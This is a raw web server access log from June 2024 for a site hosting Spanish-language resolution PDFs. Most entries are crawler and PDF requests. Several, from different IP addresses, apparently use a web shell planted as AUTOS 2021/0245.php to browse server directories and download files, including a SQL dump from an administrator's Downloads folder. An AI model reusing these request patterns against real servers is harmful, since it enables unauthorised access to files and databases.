47.128.111.209 - - [23/Jun/2024:01:30:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5C&f=changelog.php&ft=download&white=1 HTTP/1.1" 200 4829
178.128.208.138 - - [23/Jun/2024:01:32:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1751-1800&f=00001787.tif HTTP/1.1" 200 17695
178.128.208.138 - - [23/Jun/2024:01:32:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
157.230.241.242 - - [23/Jun/2024:01:32:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
178.128.208.138 - - [23/Jun/2024:01:32:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
157.230.241.242 - - [23/Jun/2024:01:32:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
157.230.241.242 - - [23/Jun/2024:01:32:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
178.128.208.138 - - [23/Jun/2024:01:32:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
45.77.253.178 - - [23/Jun/2024:01:32:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
206.189.147.251 - - [23/Jun/2024:01:32:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_tif HTTP/1.1" 200 175
206.189.147.242 - - [23/Jun/2024:01:32:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
45.32.118.99 - - [23/Jun/2024:01:32:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
66.249.66.21 - - [23/Jun/2024:01:32:23 -0500] "GET /Publicaciones/2024EE88427.pdf HTTP/1.1" 404 227
216.245.221.92 - - [23/Jun/2024:01:32:32 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [23/Jun/2024:01:33:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2302.pdf HTTP/1.1" 200 364774
216.244.66.195 - - [23/Jun/2024:01:33:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2339.pdf HTTP/1.1" 200 365495
201.245.192.253 - - [23/Jun/2024:01:33:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
216.244.66.195 - - [23/Jun/2024:01:34:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2472.pdf HTTP/1.1" 200 428350
47.128.113.30 - - [23/Jun/2024:01:34:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=C%3A%5CUsers%5CAdministrator%5CDownloads&f=datos.sql&ft=download HTTP/1.1" 200 20133
216.244.66.195 - - [23/Jun/2024:01:35:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0290.pdf HTTP/1.1" 200 530276
216.244.66.195 - - [23/Jun/2024:01:35:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0372.pdf HTTP/1.1" 200 539224
143.198.193.199 - - [22/Jun/2024:23:55:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=2072.pdf&ft=download HTTP/1.1" 200 327335
45.32.106.18 - - [23/Jun/2024:01:36:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5C&f=shortcodes.php&ft=download&white=1 HTTP/1.1" 200 12018
216.244.66.195 - - [23/Jun/2024:01:36:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0642.pdf HTTP/1.1" 200 314267
66.249.66.20 - - [23/Jun/2024:01:36:23 -0500] "GET /BLA/resoluciones/AUTOS%202023/05910.pdf HTTP/1.1" 304 -
216.244.66.195 - - [23/Jun/2024:01:36:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/3750.pdf HTTP/1.1" 200 439619
216.244.66.195 - - [23/Jun/2024:01:37:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0044.pdf HTTP/1.1" 200 308622
216.245.221.92 - - [23/Jun/2024:01:37:32 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [23/Jun/2024:01:37:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0144.pdf HTTP/1.1" 200 272669
201.245.192.253 - - [23/Jun/2024:01:37:40 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
201.245.192.253 - - [23/Jun/2024:01:38:01 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
216.244.66.195 - - [23/Jun/2024:01:38:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0298.pdf HTTP/1.1" 200 291590
201.245.192.253 - - [23/Jun/2024:01:38:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
